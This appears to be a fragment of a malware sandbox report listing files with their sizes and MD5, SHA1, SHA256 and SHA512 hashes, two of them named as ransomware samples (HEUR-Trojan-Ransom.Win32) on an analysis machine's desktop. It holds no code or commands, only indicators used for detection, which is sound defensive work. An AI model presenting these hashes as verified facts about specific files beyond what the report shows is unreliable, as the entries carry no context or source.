SHA512a2d7411f3bda70013f830bc8ea075fd1fa2e8f3f9d5ff9a2c9933aecd5b702ea7b457a259da284154cef75d5794ae3307f98dcbdb999d9f8502c0290ca41c459
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe
Filesize199KB
MD5edeac800c2ae1d21c7441f61e4b2b36e
SHA15d1d3321749e64988264f3f4021fba531252cdf5
SHA25632a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95
SHA51249f35f5fdd73ae07e87a416c8a09624970bd9b7e0ee202779f0dd29a45bcad2eea99cf64e9af1da51a0ac673066f63632ab7d0bfab09d4ad3837e7ed545fef5e
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Generic-6f9bed90c1d6df1c7b259f832130b5fef5e0d0c9dc6c2564dad53dc0ca30bb0e.exe
Filesize68KB
MD549d8bd6dcaa501ca742bd686c161e5e0
SHA19acdd840615e4f4cd37f50e66b7bb7bb222d4fca
SHA2566f9bed90c1d6df1c7b259f832130b5fef5e0d0c9dc6c2564dad53dc0ca30bb0e
SHA51226d480f4480c99093859d3bb697dacc69c7165fc75603c717db6c1d0959463d7d9a33a32d3e1ec5360b0d031db4b77734f0ebcbf2bafb46b7390e1967d8a7b12
-
Filesize
622B
MD5684549300c14dbb9757a053ebbbdf090
SHA1bd88a9f0e4d6a62ee79b31479fd8e8fb395a0b7e
SHA256a7a544c0b632b2b4acfaf84ec105f5d1bc77e40072cba549e5934ff17706db60
SHA512b3b98d2e699e96454889373909caf07207acb6e1a4ef48df011a9082c9dc8acd923f7dd36615ba376dbf67e35b941c944207aa0540652e16389c9c27f3af4f0d
-
Filesize
1.7MB
MD53db55d2535166791a49a7b0f35e67f76
SHA1bd93858e0245f0ae75dfec316e19cb2d79b09493
SHA256211b6df3952855e8cef2b330810b517ac675dfd37b3422df96bfa4ca75079e85
SHA51261fca359e3390969a56634e05466c9b1b96f45c7a45f6af58271f3a5969c7c91587b934918ea46511c7c0c30ee386c2e80a2edc21c8b63d16338e649f863c213
-
Filesize
1.8MB
MD507c0a5a7b7b150199f30eb3d4bf31ec7
SHA138f912b7bdf218c899964f81bff384b0644cfaaa
SHA2567515eb5d28d8a411c3c4c386412620c8afb7abf2c805282c2bea44dec4752d99
SHA512cd3fbc4b04025157f800ec6853d42ceb620a1af0c6441be03e7d9cbdd7d6161b18af79d7bf30c7becbf00b27fb728e57fba014766f0249557519587c093a84ed
-
Filesize
10.5MB
MD5333ed59e526efd80b2701f3ff1cfd8a7
SHA18abbf5ee9ec9823ae093cd303874c2522df9d433
SHA256cb7723667f487b767417f206b86d5ed7a7932034c976498f7f83309d93f53a90
SHA512c96f8dc9780eb81c3186f0ba8cf9211eb220f75f528a1a9cce3c1b4b3d9df27383027c8a787068dcd0f7ea727807109abc06a333d526bda23379481962ae12b9
-
Filesize
10.4MB
MD5577d8516f9381083e2e46221a23156aa
SHA1bc9ca92bceed06241bd02e0c1812d80bc85c90d9
SHA2561c7f021f3d58a1041cedfaca4543e8da97f2d2b345de52c070da808b5d774539
SHA5125b7038e43c74ce4513e54cd016bf3b44a05ad4e77bf5150e7687e7663069498554f8449ea3f90ec25372ca613a70f06e99674c58209eb13f8cb8921882580f5a
-
Filesize
5KB
MD501089b42e74ea658e40dc899809914b2
SHA12eacc62044611652bb4280825e9caff0585430a2
SHA256c942e1e21206b7006b031ddce8b8b90aed9397537e9d072cccd39d6bee741041
SHA51215b43e7b1dca13b9a12949b74000ef1131201226afbcc6aca35e11cedd034a0833b0d078b9b2f814a3b7c26dee8b4c5e02e2b2793e437840f6eb6517fe306da0
-
Filesize
1KB
MD5699b52e82b3923be98c6f72b35751668
SHA108102669b3e46c370211823bba55ae532a2e2475
SHA256b5c83add62e62c89d84aad234804bb615bed6b7371574bcda0def1b9c7774afa
SHA51206c3277879016c8c120f63af5ed166c854e77e8b2d45d20cc07343ed25d6559c9f1487d9c1650903c61bf18fde807290096b864643187b26eec7c05b82acb1a5
-
Filesize
5KB
MD52606d4c6ce216d24adc060c33f589007
SHA1acecafd852caef3709f941444720e611f499e0c4
SHA25683cf2d4fa2daf97b3d9a65e61a7c613bc84e3bc12f8863251ce5dd090a86ea92
SHA51201b40fdd0bf8014ee5726ae670d3d91e26fccdf98225ccfe451b39c1c69dfa5c4e7221e5ef7241c607b8bb8832aaf8c3d7892e91e66990788bcb52b919ce4b9e
-
Filesize
145B
MD5ca13857b2fd3895a39f09d9dde3cca97
SHA18b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0
SHA256cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae
SHA51255e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47